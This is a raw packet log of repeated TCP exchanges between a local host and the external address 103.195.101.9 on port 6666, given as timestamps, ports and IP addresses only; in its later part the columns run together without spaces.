Mar 14, 2024 16:35:29.861727953 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.861741066 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.861752987 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.861767054 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.861828089 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.861828089 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.861857891 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:30.435298920 CET  49713        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:30.437127113 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:30.555514097 CET  6666         49713      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:30.555622101 CET  49713        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:30.556638956 CET  49713        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:30.610512972 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:30.610599041 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:30.676904917 CET  6666         49713      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:30.678755045 CET  49713        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:30.782506943 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:30.844836950 CET  6666         49713      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:30.844968081 CET  49713        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:30.965857983 CET  6666         49713      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:30.966011047 CET  49713        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:32.344976902 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:32.517266035 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:32.517349005 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:32.638350010 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:32.733289957 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:32.853256941 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:32.866292000 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:33.032346010 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:33.032411098 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:33.071455002 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:33.152614117 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:33.152754068 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:41.893474102 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:42.065007925 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:42.065102100 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:42.185700893 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:42.248820066 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:42.368715048 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:42.379302025 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:42.547943115 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:42.548016071 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:42.719628096 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:43.065274000 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:43.233227015 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:43.353337049 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:43.359709978 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:43.532346010 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:43.532419920 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:43.703964949 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:51.452989101 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:51.626338959 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:51.627876997 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:51.748450994 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:51.795708895 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:51.915884018 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:51.922976017 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:52.094681978 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:52.096719027 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:52.266773939 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:01.001247883 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:01.172979116 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:01.173031092 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:01.293237925 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:01.373827934 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:01.493738890 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:01.495963097 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:01.657270908 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:01.657409906 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:01.829123974 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:03.071325064 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:03.264580011 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:03.376343012 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:03.376426935 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:03.384473085 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:03.384551048 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:10.546721935 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:10.722218037 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:10.722368956 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:10.843286991 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:11.061372995 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:11.142256975 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:11.142396927 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:11.144505024 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:11.181484938 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:11.181593895 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:11.313221931 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:11.313293934 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:11.485476971 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:20.104717016 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:20.269161940 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:20.269334078 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:20.389518976 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:20.561383009 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:20.681164026 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:20.684565067 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:20.845663071 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:20.845783949 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:21.016990900 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:29.731618881 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:29.891597033 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:29.891722918 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:30.011864901 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:30.108192921 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:30.228379965 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:30.420799971 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:31.365262985 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:31.532262087 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:31.532327890 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:31.704183102 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:33.070487976 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:33.217596054 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:33.337831020 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:33.420703888 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:36.093310118 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:36.266725063 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:36.266803026 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:36.387383938 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:36.577584028 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:36.697787046 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:36.697904110 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:36.818212986 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:36.818330050 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:36.938527107 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:36.940275908 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:37.111351013 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:37.111443043 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:37.282126904 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:46.124736071 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:46.297818899 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:46.297934055 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:46.418524981 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:46.608231068 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:46.728195906 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:46.735160112 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:46.907393932 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:46.907512903 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:47.079206944 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:55.680154085 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:55.844970942 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:55.845030069 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:55.965349913 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:56.014448881 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:56.134546995 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:56.136450052 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:56.299257040 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:56.299320936 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:56.469614029 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:58.843127966 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:59.018153906 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:59.018233061 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:59.138607979 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:59.186294079 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:59.307615042 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:59.310039043 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:59.485358000 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:36:59.485558987 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:36:59.657111883 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:03.070864916 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:03.123792887 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:03.244152069 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:03.295711040 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:08.390214920 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:08.563422918 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:08.563513994 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:08.684456110 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:08.733167887 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:08.853060961 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:08.854703903 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:09.016788960 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:09.016875029 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:09.188154936 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:10.764985085 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:10.938235044 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:10.938337088 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:11.059277058 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:11.108244896 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:11.228286982 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:11.230304956 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:11.391720057 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:11.391916990 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:11.563301086 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:14.327780962 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:14.500670910 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:14.500874996 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:14.621253014 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:14.670667887 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:14.790761948 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:14.792634010 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:14.954139948 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:14.954286098 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:15.126101971 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:23.874674082 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:24.047724962 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:24.047866106 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:24.172349930 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:24.217528105 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:24.337488890 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:24.339457989 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:24.500813007 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:24.500880003 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:24.673074007 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:27.265577078 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:27.438432932 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:27.438553095 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:27.558898926 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:27.608186007 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:37:27.728523970 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:37:27.730483055 CET  49712        6666       192.168.2.6    103.195.101.9
                                            Mar 14, 2024 16:37:27.891387939 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:27.891467094 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:28.063509941 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:33.071624994 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:33.123871088 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:33.248828888 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:33.295680046 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:36.812257051 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:36.985388041 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:36.985498905 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:37.110007048 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:37.311675072 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:37.407247066 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:37.407308102 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:37.417689085 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:37.431576967 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:37.431685925 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:37.578828096 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:37.579274893 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:37.751106024 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:38.983915091 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:39.157067060 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:39.157213926 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:39.277282000 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:39.342605114 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:39.462394953 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:39.464138031 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:39.625858068 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:39.625931025 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:39.798072100 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:48.530678034 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:48.703794003 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:48.703898907 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:48.824161053 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:48.873897076 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:48.993596077 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:48.995402098 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:49.157231092 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:49.157305956 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:49.329088926 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:49.329200983 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:49.449857950 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:49.498773098 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:49.619318962 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:49.621139050 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:49.786149025 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:49.786199093 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:49.954144955 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:58.754430056 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:58.922477961 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:58.922558069 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:59.042572021 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:59.139422894 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:59.259438992 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:59.295207024 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:59.469700098 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:37:59.469767094 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:37:59.642195940 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:03.072233915 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:03.139383078 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:03.259162903 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:03.342549086 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:08.297995090 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:08.469583988 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:08.469676971 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:08.589955091 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:08.639530897 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:08.762622118 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:08.764527082 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:08.938225985 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:08.938360929 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:09.110500097 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:14.608952045 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:14.781919003 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:14.782018900 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:14.902157068 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:15.030075073 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:15.150226116 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:15.151973963 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:15.313694954 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:15.313920975 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:15.485091925 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:22.702508926 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:22.875722885 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:22.875857115 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:22.995966911 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:23.139425993 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:23.259299040 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:23.261147022 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:23.422898054 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:23.423089027 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:23.594727039 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:26.686880112 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:26.860306025 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:26.860384941 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:26.980962038 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:27.139441967 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:27.259650946 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:27.342525005 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:27.435369015 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:27.610284090 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:27.610382080 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:27.782115936 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:33.071193933 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:33.139374971 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:33.259314060 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:33.342489004 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:36.258558989 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:36.422616005 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:36.422686100 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:36.542865992 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:36.639390945 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:36.759335041 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:36.760992050 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:36.922611952 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:36.922672033 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:37.094372034 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:45.796246052 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:45.969927073 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:45.970019102 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:46.090212107 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:46.139401913 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:46.259632111 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:46.261352062 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:46.423476934 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:38:46.423584938 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:38:46.594821930 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:03.070924997 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:03.123815060 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:03.243601084 CET666649712103.195.101.9192.168.2.6
